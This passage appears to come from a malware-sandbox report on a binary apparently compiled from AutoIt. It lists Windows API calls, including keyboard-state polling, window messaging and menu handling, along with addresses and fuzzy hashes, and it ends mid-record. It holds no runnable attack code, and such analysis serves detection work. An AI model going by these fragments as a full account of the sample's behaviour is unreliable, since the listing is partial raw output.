                                                      • timeGetTime.WINMM ref: 00185535
                                                        • Part of subcall function 0014083E: timeGetTime.WINMM(?,00000002,0012C22C), ref: 00140842
                                                      • Sleep.KERNEL32(0000000A), ref: 00185561
                                                      • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00185585
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001855A7
                                                      • SetActiveWindow.USER32 ref: 001855C6
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001855D4
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 001855F3
                                                      • Sleep.KERNEL32(000000FA), ref: 001855FE
                                                      • IsWindow.USER32 ref: 0018560A
                                                      • EndDialog.USER32(00000000), ref: 0018561B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: a5235d242a690014aedd6a94aa6789af0a7e4330e47be13be32035404a4d73ee
                                                      • Instruction ID: 3fe4dbf9d3d7974d5da84f6e1a6d6ae8cc9d02226474a9fc8321ff7e4123edc5
                                                      • Opcode Fuzzy Hash: a5235d242a690014aedd6a94aa6789af0a7e4330e47be13be32035404a4d73ee
                                                      • Instruction Fuzzy Hash: A821C0B0204A45AFE7526BA0EDC9A3A3BABEB48385F141118F506859B1DF719ED0DF31
                                                      APIs
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • CoInitialize.OLE32(00000000), ref: 0018DC2D
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0018DCC0
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0018DCD4
                                                      • CoCreateInstance.OLE32(001B3D4C,00000000,00000001,001DB86C,?), ref: 0018DD20
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0018DD8F
                                                      • CoTaskMemFree.OLE32(?,?), ref: 0018DDE7
                                                      • _memset.LIBCMT ref: 0018DE24
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0018DE60
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0018DE83
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0018DE8A
                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0018DEC1
                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0018DEC3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                      • String ID:
                                                      • API String ID: 1246142700-0
                                                      • Opcode ID: 24f1b677eff47d1d9cf7d0b38ef22bfd1fdf2e22011360a27655fc5b9cd40b96
                                                      • Instruction ID: b8a3c02dbf303625ed7fc120cc4c12b8fd972372c84e8b38bb4bbff3eb3607ed
                                                      • Opcode Fuzzy Hash: 24f1b677eff47d1d9cf7d0b38ef22bfd1fdf2e22011360a27655fc5b9cd40b96
                                                      • Instruction Fuzzy Hash: DBB1DA75A00219AFDB04EFA4D888DAEBBB9FF48314B148559F905EB251DB30EE45CF50
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00180896
                                                      • SetKeyboardState.USER32(?), ref: 00180901
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00180921
                                                      • GetKeyState.USER32(000000A0), ref: 00180938
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00180967
                                                      • GetKeyState.USER32(000000A1), ref: 00180978
                                                      • GetAsyncKeyState.USER32(00000011), ref: 001809A4
                                                      • GetKeyState.USER32(00000011), ref: 001809B2
                                                      • GetAsyncKeyState.USER32(00000012), ref: 001809DB
                                                      • GetKeyState.USER32(00000012), ref: 001809E9
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00180A12
                                                      • GetKeyState.USER32(0000005B), ref: 00180A20
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 2b2993fbfd2d0c783b67021069b55f5d03064722356bead7fa5f64677a6595df
                                                      • Instruction ID: f6c9802b20194eb0148eb41d4ed7dd5a370abb2dbc2d928e44ffa7371cbd0133
                                                      • Opcode Fuzzy Hash: 2b2993fbfd2d0c783b67021069b55f5d03064722356bead7fa5f64677a6595df
                                                      • Instruction Fuzzy Hash: A451C521E0478C29FB76FBA088507AAABB49F16384F084599C5C6575C3DB649B8CCFA1
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 0017CE1C
                                                      • GetWindowRect.USER32(00000000,?), ref: 0017CE2E
                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0017CE8C
                                                      • GetDlgItem.USER32(?,00000002), ref: 0017CE97
                                                      • GetWindowRect.USER32(00000000,?), ref: 0017CEA9
                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0017CEFD
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0017CF0B
                                                      • GetWindowRect.USER32(00000000,?), ref: 0017CF1C
                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0017CF5F
                                                      • GetDlgItem.USER32(?,000003EA), ref: 0017CF6D
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0017CF8A
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0017CF97
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: 2f6bdb0634cff865c95db15577cfd1ff024c3e2a808402d6c78846ba4c1b3bc7
                                                      • Instruction ID: 724c8617f6e4e2dafd33daccbfc21a0b5ede9fc5f0991b5de5b683a48875c1d8
                                                      • Opcode Fuzzy Hash: 2f6bdb0634cff865c95db15577cfd1ff024c3e2a808402d6c78846ba4c1b3bc7
                                                      • Instruction Fuzzy Hash: 4C513271B00205AFDF18CF69DD99AAEBBB6EB8C710F14822DF519D7690DB70AD408B50
                                                      APIs
                                                        • Part of subcall function 00121F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00122412,?,00000000,?,?,?,?,00121AA7,00000000,?), ref: 00121F76
                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 001224AF
                                                      • KillTimer.USER32(-00000001,?,?,?,?,00121AA7,00000000,?,?,00121EBE,?,?), ref: 0012254A
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0015BFE7
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00121AA7,00000000,?,?,00121EBE,?,?), ref: 0015C018
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00121AA7,00000000,?,?,00121EBE,?,?), ref: 0015C02F
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00121AA7,00000000,?,?,00121EBE,?,?), ref: 0015C04B
                                                      • DeleteObject.GDI32(00000000), ref: 0015C05D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: dcf97618284bb4ed9df1d3a05d587389cc528eb8bcd868bed55aa28a7038a71b
                                                      • Instruction ID: 63b8063849952b872ede8985ba7d4b0d87545e1e5fb944c6642523157b2aef90
                                                      • Opcode Fuzzy Hash: dcf97618284bb4ed9df1d3a05d587389cc528eb8bcd868bed55aa28a7038a71b
                                                      • Instruction Fuzzy Hash: 4961AD315047A0EFEB25AF14ED88B2EB7F1FB54312F108619E4524A9A0C770A8E1DF91
                                                      APIs
                                                        • Part of subcall function 001229AB: GetWindowLongW.USER32(?,000000EB), ref: 001229BC
                                                      • GetSysColor.USER32(0000000F), ref: 001225AF
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: 8cbed6d368c38791db778a39b2f2f4dcbe57101a378514508955a3693e7f2da5
                                                      • Instruction ID: d7bbb894b4752458f2945ce375ab952bfc8c80feeba549824eb6c6537c2839f7
                                                      • Opcode Fuzzy Hash: 8cbed6d368c38791db778a39b2f2f4dcbe57101a378514508955a3693e7f2da5
                                                      • Instruction Fuzzy Hash: 3441B232104150BFDB255F28A888BBD3766FB0A331F194361FD658E1E1D7348D91DB61
                                                      APIs
                                                        • Part of subcall function 00140B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00132A3E,?,00008000), ref: 00140BA7
                                                        • Part of subcall function 00140284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00132A58,?,00008000), ref: 001402A4
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00132ADF
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00132C2C
                                                        • Part of subcall function 00133EBE: _wcscpy.LIBCMT ref: 00133EF6
                                                        • Part of subcall function 0014386D: _iswctype.LIBCMT ref: 00143875
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 537147316-3738523708
                                                      • Opcode ID: 54b69540191c88c97d6b28d2307c7e2e87c5e72a5e2a59139ee5d9eb370711f8
                                                      • Instruction ID: 933792a8762fc2f55a7e9e3198b78760b43b950e63fa22ec52ad51d8a24dabed
                                                      • Opcode Fuzzy Hash: 54b69540191c88c97d6b28d2307c7e2e87c5e72a5e2a59139ee5d9eb370711f8
                                                      • Instruction Fuzzy Hash: 6E0290711083419FC724EF24C881AAFBBF5BFA9354F10492DF499972A2DB31DA49CB52
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,001B0980), ref: 0018AF4E
                                                      • GetDriveTypeW.KERNEL32(00000061,001DB5F0,00000061), ref: 0018B018
                                                      • _wcscpy.LIBCMT ref: 0018B042
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2820617543-1000479233
                                                      • Opcode ID: 4bf079e09bbe2832e6b98257620ab60bb3ead8e019389ec5df2acc209f23f566
                                                      • Instruction ID: c1bca4714847cd85ecb5ba4e4129d7baf59563cb7387a46ffae84f124181cd7e
                                                      • Opcode Fuzzy Hash: 4bf079e09bbe2832e6b98257620ab60bb3ead8e019389ec5df2acc209f23f566
                                                      • Instruction Fuzzy Hash: A551BD701083159BC314EF14D891AAFB7A5FFA4704F90491EF5965B2A2EB30EE09CF82
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __i64tow__itow__swprintf
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 421087845-2263619337
                                                      • Opcode ID: 4864af508d7414fa4033aa3c3452a431c16ada4e19f9c36c0a2d14cfa1cd7d12
                                                      • Instruction ID: aa9af50bbb38cb09554f3c4d370f86bfc9a31dd7a76a9f235aca5715a6ff81a8
                                                      • Opcode Fuzzy Hash: 4864af508d7414fa4033aa3c3452a431c16ada4e19f9c36c0a2d14cfa1cd7d12
                                                      • Instruction Fuzzy Hash: EE41F471604209EFEB38DF74E842E7A73E8EF15300F20446EE559DB292EB719945CB10
                                                      APIs
                                                      • _memset.LIBCMT ref: 001A778F
                                                      • CreateMenu.USER32 ref: 001A77AA
                                                      • SetMenu.USER32(?,00000000), ref: 001A77B9
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001A7846
                                                      • IsMenu.USER32(?), ref: 001A785C
                                                      • CreatePopupMenu.USER32 ref: 001A7866
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001A7893
                                                      • DrawMenuBar.USER32 ref: 001A789B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                      • String ID: 0$F
                                                      • API String ID: 176399719-3044882817
                                                      • Opcode ID: 3bf032ff7aec40042c6428648981824f8c6a21aa437e7d92d7bf50f722b109d2
                                                      • Instruction ID: 653dd0b8f6fdd359c39819c559c0fa6c6dd7c2c33d119c95281059496e8a9eb6
                                                      • Opcode Fuzzy Hash: 3bf032ff7aec40042c6428648981824f8c6a21aa437e7d92d7bf50f722b109d2
                                                      • Instruction Fuzzy Hash: 40414778A00209EFDB20DF64D888EAABBB5FF49310F154129F945A73A0D731AA10CF50
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 001A7B83
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 001A7B8A
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 001A7B9D
                                                      • SelectObject.GDI32(00000000,00000000), ref: 001A7BA5
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 001A7BB0
                                                      • DeleteDC.GDI32(00000000), ref: 001A7BB9
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 001A7BC3
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 001A7BD7
                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 001A7BE3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: static
                                                      • API String ID: 2559357485-2160076837
                                                      • Opcode ID: 58206d15bc41eefaa256e37bb41901961b973c0ba097cf84164cf42a91af4e9d
                                                      • Instruction ID: 8680007a3812ab3134f91ba08be0e2cc16bc886a343929b83f681595d02bdf49
                                                      • Opcode Fuzzy Hash: 58206d15bc41eefaa256e37bb41901961b973c0ba097cf84164cf42a91af4e9d
                                                      • Instruction Fuzzy Hash: 853165B6104218ABDF129FA4DC49FEB3B69EF0E360F100315FA55A61E0D731E960DBA4
                                                      APIs
                                                      • _memset.LIBCMT ref: 0014706B
                                                        • Part of subcall function 00148D58: __getptd_noexit.LIBCMT ref: 00148D58
                                                      • __gmtime64_s.LIBCMT ref: 00147104
                                                      • __gmtime64_s.LIBCMT ref: 0014713A
                                                      • __gmtime64_s.LIBCMT ref: 00147157
                                                      • __allrem.LIBCMT ref: 001471AD
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001471C9
                                                      • __allrem.LIBCMT ref: 001471E0
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001471FE
                                                      • __allrem.LIBCMT ref: 00147215
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00147233
                                                      • __invoke_watson.LIBCMT ref: 001472A4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                      • String ID:
                                                      • API String ID: 384356119-0
                                                      • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                      • Instruction ID: 5321c5ce6f519156f82ed1f7f489152666140397b30f3e9a77c2b10e45a05a97
                                                      • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                      • Instruction Fuzzy Hash: 3F711A71A05717ABD714DF78CC41B6AB3A8AF25364F14423AF924E72D1E7B0D94487D0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00182CE9
                                                      • GetMenuItemInfoW.USER32(001E7890,000000FF,00000000,00000030), ref: 00182D4A
                                                      • SetMenuItemInfoW.USER32(001E7890,00000004,00000000,00000030), ref: 00182D80
                                                      • Sleep.KERNEL32(000001F4), ref: 00182D92
                                                      • GetMenuItemCount.USER32(?), ref: 00182DD6
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00182DF2
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00182E1C
                                                      • GetMenuItemID.USER32(?,?), ref: 00182E61
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00182EA7
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00182EBB
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00182EDC
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                      • String ID:
                                                      • API String ID: 4176008265-0
                                                      • Opcode ID: 9852e8ed37cdd9ec9a39528ceb7800ff1c67b649721f3339dc9426bfa3a964cf
                                                      • Instruction ID: f8c83fa758c2583c7771d15212572aa392a6a1e5db25fc40dc499c32148c9596
                                                      • Opcode Fuzzy Hash: 9852e8ed37cdd9ec9a39528ceb7800ff1c67b649721f3339dc9426bfa3a964cf
                                                      • Instruction Fuzzy Hash: BD61AF70900249AFDB22EFA4CC88EBFBBB9EB44304F140259F851A7291D731AE45DF24
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001A75CA
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001A75CD
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001A75F1
                                                      • _memset.LIBCMT ref: 001A7602
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001A7614
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001A768C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow_memset
                                                      • String ID:
                                                      • API String ID: 830647256-0
                                                      • Opcode ID: 0717ba7371e6878a0bd5e3ee63f24827c7f660b1654216f76f840cc87ceb9a9d
                                                      • Instruction ID: e758d952efeb9d87dcfe98eb3d6eab68eb5be9848d8737d8ddd2d58396d53189
